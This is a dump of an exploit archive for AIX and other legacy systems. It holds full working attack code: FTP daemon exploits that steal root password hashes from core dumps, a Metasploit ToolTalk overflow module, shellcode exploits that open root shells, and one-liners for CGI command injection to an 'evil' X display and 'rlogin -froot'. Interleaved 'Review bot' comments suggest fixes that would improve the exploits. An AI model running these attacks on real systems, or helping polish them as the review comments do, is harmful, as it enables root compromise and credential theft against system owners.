print "\t$x";
}
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";
print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
print $sock "NLST ~" . "A" x 5000 . "\r\n";
$x = <$sock>;
while(<$sock>) {
print;
}
print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
## CHEERIO!

328
exploits/aix/remote/14456.c Normal file

@ -0,0 +1,328 @@
/*
* IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
*
* Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
*
* bug found & exploited by Kingcope
*
* Version 2.0 - July 2010
* ----------------------------------------------------------------------------
* Description: -
* The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
* The fun part here is that it creates a coredump file in the current -
* directory if it is set writable by the logged in user. -
* The goal of the exploit is to get the DES encrypted user hashes -
* off the server. These can be later cracked with JtR. -
* This is accomplished by populating the memory with logins of the user -
* we would like the encrypted hash from. Logging in three times with the -
* target username should be enough so that the DES hash is included in the -
* 'core' file. -
* The FTPd banner looks like below. -
* 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. -
* 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. -
* ----------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>
int createconnection(char *target, char *targetport);
void getline(int s);
void putline(int s, char *out);
void usage(char *exe);
char in[8096];
char out[8096];
int main(int argc, char *argv[])
{
extern int optind;
extern char *optarg;
int haveuser=0,havepassword=0;
int s,s2,nsock;
int c,k,len;
int fd;
char *target = NULL;
char *username = "ftp";
char *password = "guest";
char *writeto = "pub";
char *crackme = "root";
char *targetport = "21";
int uselist = 0;
char *myip = NULL;
char *as = NULL;
int octet_in[4], port;
struct sockaddr_in yo, cli;
char *oct = NULL;
while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) {
switch(c) {
case 'h':
target = (char*)malloc(strlen(optarg)+1);
strcpy(target, optarg);
break;
case 'i':
myip = (char*)malloc(strlen(optarg)+1);
strcpy(myip, optarg);
break;
case 'p':
targetport = (char*)malloc(strlen(optarg)+1);
strcpy(targetport, optarg);
break;
case 'l':
username = (char*)malloc(strlen(optarg)+1);
strcpy(username, optarg);
haveuser = 1;
break;
case 'k':
password = (char*)malloc(strlen(optarg)+1);
strcpy(password, optarg);
havepassword = 1;
break;
case 'd':
writeto = (char*)malloc(strlen(optarg)+1);
strcpy(writeto, optarg);
break;
case 'c':
crackme = (char*)malloc(strlen(optarg)+1);
strcpy(crackme, optarg);
break;
case 's':
uselist = 1;
break;
default:
usage(argv[0]);
}
}
if (target == NULL || myip == NULL)
usage(argv[0]);
if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
usage(argv[0]);
}
s = createconnection(target, targetport);
getline(s);
fprintf(stderr, "populating DES hash in memory...\n");
for (k=0;k<3;k++) {
snprintf(out, sizeof out, "USER %s\r\n", crackme);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS abcdef\r\n");
putline(s,out);
getline(s);
}
fprintf(stderr, "logging in...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
getline(s);
getline(s);
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
getline(s);
fprintf(stderr, "triggering segmentation violation...\n");
as = (char*)malloc(2000);
memset(as, 'A', 2000);
as[2000-1]=0;
if (!uselist) {
snprintf(out, sizeof out, "NLST ~%s\r\n", as);
} else {
/* AIX 5.3 trigger - thanks to karol */
snprintf(out, sizeof out, "LIST ~%s\r\n", as);
}
putline(s, out);
memset(in, '\0', sizeof in);
if (recv(s, in, sizeof in, 0) < 1) {
printf("trigger succeeded!\nwaiting for core file to be created...\n");
} else {
printf("trigger seems to have failed, proceeding anyways...\n"
"\nwaiting for core file to be created...\n");
}
sleep(5);
close(s);
s = createconnection(target, targetport);
getline(s);
fprintf(stderr, "logging in 2nd time...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
getline(s);
getline(s);
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
getline(s);
fprintf(stderr, "getting core file...\n");
snprintf(out, sizeof out, "TYPE I\r\n");
putline(s, out);
getline(s);
port = getpid() + 1024;
len = sizeof(cli);
bzero(&yo, sizeof(yo));
yo.sin_family = AF_INET;
yo.sin_port=htons(port);
yo.sin_addr.s_addr = htonl(INADDR_ANY);
oct=(char *)strtok(myip,".");
octet_in[0]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[1]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[2]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[3]=atoi(oct);
snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
putline(s, out);
getline(s);
if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
return -1;
}
if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
perror("bind");
close(s2);
exit(1);
}
if (listen(s2, 10) < 0) {
perror("listen");
close(s2);
exit(1);
}
snprintf(out, sizeof out, "RETR core\r\n");
putline(s, out);
getline(s);
if (strstr(in, "150") == NULL) {
fprintf(stderr, "core file not found... terminating.\n");
close(s);
exit(1);
}
fd = open("core", O_WRONLY | O_CREAT);
if (fd == -1) {
perror("open on local core file");
close(s);
exit(1);
}
sleep(1);
if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
perror("accept");
close(s);
exit(1);
}
do {
k = recv(nsock, in, sizeof in, 0);
if (k < 1) break;
write(fd, in, k);
} while (k > 0);
close(nsock);
close(fd);
close(s);
fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");
fprintf(stderr, "done.\n");
return 0;
}
int createconnection(char *target, char *targetport) {
struct addrinfo hints, *res;
int s;
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if (getaddrinfo(target, targetport, &hints, &res)) {
perror("getaddrinfo");
exit(1);
}
s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (s < 0) {
perror("socket");
exit(1);
}
if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
perror("connect");
exit(1);
}
return s;
}
void getline(int s)
{
memset(in, '\0', sizeof in);
if (recv(s, in, sizeof in, 0) < 1) {
perror("recv");
close(s);
exit(1);
}
fprintf(stderr, "<\t%s", in);
}
void putline(int s, char *out) {
fprintf(stderr, ">\t%s", out);
if (send(s, out, strlen(out), 0) == -1) {
perror("send");
close(s);
exit(1);
}
}
void usage(char *exe)
{
fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
" [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
exe);
exit(0);
}
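Review bot: `open("core", O_WRONLY | O_CREAT)` omits the mode argument that O_CREAT requires, so the local file that receives the downloaded core, and therefore the password hashes later pulled out of it with `strings`, is created with whatever garbage happens to be in the variadic slot as its permission bits; pass an explicit `0600` and add `O_TRUNC` so a previous core is not left partially overwritten. The `len` passed to accept() should be declared `socklen_t` rather than `int`.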

289
exploits/aix/remote/16930.rb Executable file

@ -0,0 +1,289 @@
##
# $Id: rpc_ttdbserverd_realpath.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in _tt_internal_realpath
function of the ToolTalk database server (rpc.ttdbserverd).
},
'Author' =>
[
'Adriano Lima <adriano@risesecurity.org>',
'ramon'
],
'Version' => '$Revision: 10998 $',
'Platform' => [ 'aix' ],
'References' =>
[
[ 'CVE', '2009-2727'],
[ 'OSVDB', '55151' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[
'IBM AIX Version 6.1.4',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099430-8192 },
'Stop' => { 'Ret' => 0x20099430+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.2',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.0',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096bf0-8192 },
'Stop' => { 'Ret' => 0x20096bf0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.9',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.8',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 6.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 5.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 17 2009'))
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
begin
sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./
buf = "A"
else
buf = "AA"
end
buf << [target['Addr1']].pack('N') * (1022 + 8)
buf << [brute_target['Ret']].pack('N') * 32
if target['AIX'] =~ /6\./
buf << "AAA"
else
buf << "AA"
end
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
sunrpc_destroy
handler
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end
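Review bot: the combined target `'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7'` carries the 5.3.9 values (Ret 0x20096ba0, Addr1 0x2ff1ff14), but the dedicated 5.3.10 entry uses 0x20096bf0 and the 5.3.8 and 5.3.7 entries use 0x20096c10 / 0x2ff1ff98, so the name overstates what that entry covers; either document it as the 5.3.9 layout or narrow the name. The four 6.1.0 to 6.1.3 entries are identical apart from the `'AIX'` string and could be one entry with the version list in its description. In brute_exploit, both `rescue` clauses swallow RPCTimeout and EOFError with the print_error calls commented out, which hides whether an attempt failed or the service stopped responding; a print_status in each clause would keep that visible in the module log.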


@ -0,0 +1,16 @@
source: https://www.securityfocus.com/bid/62/info
There exists a buffer overflow in the Stalker Internet Mail Server version 1.6. If you connect to the SMTP port and issue a HELO command with a large string (several hundred bytes) for a hostname the server, and possibly MacOS, will crash.
220-Stalker Internet Mail Server V.1.6 is ready.
220 ESMTP is spoken here.
HELO
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx
[dead]


@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/64/info
There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'


@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/297/info
NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data will allow an unathorized user to relay email via this server.
Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
Specify <> in the 'Mail From' field.


@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/458/info
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
%rlogin -froot targethost.com

exploits/aix/remote/19532.pl Executable file

@ -0,0 +1,159 @@
source: https://www.securityfocus.com/bid/679/info
A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access.
#!/usr/bin/perl
# *** Synnergy Networks
# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is an return into libc exploit specificly crafted for
# one box and it is very unlikely to work on another box
# * Author:
#
# dvorak (dvorak@synnergy.net)
# Synnergy Networks (c) 1999, http://www.synnergy.net
# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek
# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
# we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffera
# loads r0 with the next address to jump to (0x1001038c)
# and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
# sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem
# to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf = the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
# 0xd00406d4 in our case# 0x00c: thi is the address where r2 is
loaded
# from just before the call to
# system(..) we set it to the TOC in our program we don't know if it
# matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
# l r2, 0x14(r1)
# b 0x10015228
# 0x10015228:
# l r12, 0x110(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x4(r12)
# b r0
# 0x1001038c:
# l r3, 0x40(r1)
# b 0x100136f8
# 0x100136f8:
# l r12, 0x3c(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x04(r12)
# *** Synnergy Networks
$bufstart = 0x2ff22724; # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of
# 'borrowed' code
$buf .= pack ("N", $bufstart); # 4
$buf .= "\xd0\x04\x06\xd4"; # 8 system call..
$buf .= "\xf0\x14\x63\x5c"; # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
$offset += 4;
$buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
$offset += 4;
$buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";
# offcourse you should change this .
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;
# EOF
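Review bot: The comment for offset 0x00c is broken across two lines so that the bare word "loaded" sits on a line of its own with no leading "#"; Perl will not read it as a comment, and the script does not parse as intended until it is rejoined to the preceding comment line ("0x00c: this is the address where r2 is loaded from ..."). That line also has a second comment fused onto it ("in our case# 0x00c:") and the typo "thi". Minor: "printf F $buf" uses the payload as a format string, so any "%" byte would be interpreted; "print F $buf" is the correct call for raw output.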

exploits/aix/remote/21093.c Normal file

@ -0,0 +1,194 @@
// source: https://www.securityfocus.com/bid/3237/info
The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.
/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland *://lsd-pl.net/ #*/
/*## pdnsd #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of some OS fingerprinting method */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1
#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"
char syscallcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <syscallcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xc0\x01\xff" /* lil r22,0x1ff */
"\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
"\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca 0x0 */
"\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
;
char findsckcode[]=
"\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
"\x41\x82\xff\xfd" /* beql <findsckcode> */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x3b\x36\xfe\x2d" /* cal r25,-467(r22) */
"\x3b\x40\x01\x01" /* lil r26,0x16 */
"\x7f\x78\xca\x14" /* cax r27,r24,r25 */
"\x7f\x69\x03\xa6" /* mtctr r27 */
"\x4e\x80\x04\x20" /* bctr */
"\xa3\x78\xff\xfe" /* lhz r27,-2(r24) */
"\xa3\x98\xff\xfa" /* lhz r28,-6(r24) */
"\x7c\x1b\xe0\x40" /* cmpl cr0,r27,r28 */
"\x3b\x36\xfe\x59" /* cal r25,-423(r22) */
"\x41\x82\xff\xe4" /* beq <findsckcode+20> */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
"\x38\x98\xff\xfc" /* cal r4,-4(r24) */
"\x38\xb8\xff\xf4" /* cal r5,-12(r24) */
"\x93\x38\xff\xf4" /* st r25,-12(r24) */
"\x88\x55\xff\xf6" /* lbz r2,-10(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
"\x2d\x03\xff\xff" /* cmpi cr2,r3,-1 */
"\x40\x8a\xff\xc8" /* bne cr2,<findsckcode+32> */
"\x40\x82\xff\xd8" /* bne <findsckcode+48> */
"\x3b\x36\xfe\x03" /* cal r25,-509(r22) */
"\x3b\x76\xfe\x02" /* cal r27,-510(r22) */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7a\xda\x14" /* cax r3,r26,r27 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7f\x25\xcb\x78" /* mr r5,r25 */
"\x88\x55\xff\xfb" /* lbz r2,-5(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
"\x40\x80\xff\xd4" /* bge <findsckcode+100> */
;
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv){
char buffer[10000],address[4],*b;
int i,n,l,cnt,sck;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland //lsd-pl.net/\n");
printf("pdnsd for AIX 4.1 4.2 PowerPC/POWER\n\n");
if(argc!=3){
printf("usage: %s address 41|42\n",argv[0]);exit(-1);
}
switch(atoi(argv[2])){
case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
default: exit(-1);
}
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(4242);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
l=ADRNUM+NOPNUM+strlen(shellcode);
*((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[0+3]=(unsigned char)(n&0xff);
b=buffer;
*((unsigned long*)b)=htonl(l);
b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<ALLIGN;i++) *b++=address[i%4];
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
*b=0;
write(sck,buffer,4+l-1);sleep(3);
send(sck,"x",1,0);
printf("sent!\n");
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
